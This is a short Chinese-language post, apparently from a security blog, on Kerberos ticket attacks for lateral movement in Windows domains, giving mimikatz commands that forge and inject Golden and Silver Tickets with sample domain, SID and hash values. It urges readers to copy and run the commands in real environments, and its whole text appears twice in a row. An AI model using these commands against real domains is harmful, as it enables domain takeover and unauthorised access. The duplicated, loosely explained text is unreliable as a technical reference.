内网渗透,票据攻击有哪些门道?!
- 内容介绍
- 文章标签
- 相关推荐
内网渗透——票据攻击的乱七八糟入口
先说一句, 这玩意儿根本不需要把每一步写得像教材,随便抄、随便改、随便跑才是红队的真谛。 栓Q了... 下面就给你们甩一堆乱套的思路,让你在真实环境里直接踩坑再爬出来。
1️⃣ 金票到底是个啥子玩意?
简单说 就是用 krbtgt 的哈希直接造出一个 TGT,它可以让你在整个域林里横冲直撞。
如果你手里有根域的 SID, 配合 krbtgt 的 AES256 密钥,就能直接生成 Enterprise Admins 组权限的金票。
mimikatz "kerberos::golden /domain:example.com /sid:S-1-5-21-3641416521-285861825-2863956705 /krbtgt:9a68826fdc2811f20d1f73a471ad7b9a /user:admin /ptt"
别忘了 这种金票只能在当前域内生效,除非你玩点高级技巧——把 SIDHistory 当成跨域桥梁,啊这...。
2️⃣ 白银票更隐蔽?
放心去做... Silver Ticket 只针对特定服务, 不需要和 KDC 打交道,直接在目标机器上生效。 这玩意儿最适合在已经拿到本地管理员权限后再去横向渗透。
mimikatz "kerberos::silver /service:cifs /target:WIN-SERVER01 /rc4:d5304f9ea69523479560ca4ebb5a2155 /user:silver /ptt"
注意:Silver Ticket 会留下日志, 但只在目标系统,而不是域控。
内网渗透——票据攻击的乱七八糟入口
先说一句, 这玩意儿根本不需要把每一步写得像教材,随便抄、随便改、随便跑才是红队的真谛。 栓Q了... 下面就给你们甩一堆乱套的思路,让你在真实环境里直接踩坑再爬出来。
1️⃣ 金票到底是个啥子玩意?
简单说 就是用 krbtgt 的哈希直接造出一个 TGT,它可以让你在整个域林里横冲直撞。
如果你手里有根域的 SID, 配合 krbtgt 的 AES256 密钥,就能直接生成 Enterprise Admins 组权限的金票。
mimikatz "kerberos::golden /domain:example.com /sid:S-1-5-21-3641416521-285861825-2863956705 /krbtgt:9a68826fdc2811f20d1f73a471ad7b9a /user:admin /ptt"
别忘了 这种金票只能在当前域内生效,除非你玩点高级技巧——把 SIDHistory 当成跨域桥梁,啊这...。
2️⃣ 白银票更隐蔽?
放心去做... Silver Ticket 只针对特定服务, 不需要和 KDC 打交道,直接在目标机器上生效。 这玩意儿最适合在已经拿到本地管理员权限后再去横向渗透。
mimikatz "kerberos::silver /service:cifs /target:WIN-SERVER01 /rc4:d5304f9ea69523479560ca4ebb5a2155 /user:silver /ptt"
注意:Silver Ticket 会留下日志, 但只在目标系统,而不是域控。